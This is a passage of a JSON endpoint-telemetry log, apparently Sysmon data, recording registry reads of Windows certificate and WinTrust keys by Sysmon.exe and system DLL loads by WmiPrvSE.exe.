"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "WmiPrvSE.exe", - "image_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573488700016, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "fastprox.dll", - "image_path": "C:\\Windows\\System32\\wbem\\fastprox.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "wbemcomn.dll", - "image_path": "C:\\Windows\\System32\\wbemcomn.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 4036, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 4036, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 4036, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Wbem", - "registry_value": "Wbem", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 4036, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 4036, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 4036, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Wbem", - "registry_value": "Wbem", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ncobjapi.dll", - "image_path": "C:\\Windows\\System32\\ncobjapi.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "wbemprox.dll", - "image_path": "C:\\Windows\\System32\\wbem\\wbemprox.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489170000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489170000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "wbemsvc.dll", - "image_path": "C:\\Windows\\System32\\wbem\\wbemsvc.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489170000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "wmiutils.dll", - "image_path": "C:\\Windows\\System32\\wbem\\wmiutils.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489170000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 4036, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573489170000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 